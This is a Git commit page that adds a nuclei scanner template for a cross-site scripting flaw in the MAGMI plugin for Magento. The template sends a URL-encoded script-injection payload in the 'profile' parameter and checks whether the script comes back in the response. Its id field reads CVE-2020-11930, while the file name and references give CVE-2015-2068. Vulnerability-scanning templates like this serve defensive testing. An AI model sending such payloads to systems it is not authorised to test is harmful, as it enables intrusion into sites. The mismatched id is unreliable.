daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2015-2068.yaml

patch-1
Muhammad Daffa 2021-10-11 18:28:08 +07:00 committed by GitHub
parent d7cd9a21de
commit 13fe132913
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
cves/2015/CVE-2015-2068.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-11930
info:
name: Magento Server Magmi Plugin - Cross Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
tags: cve,cve2015,magento,xss
requests:
- method: GET
path:
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert('XSS');</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200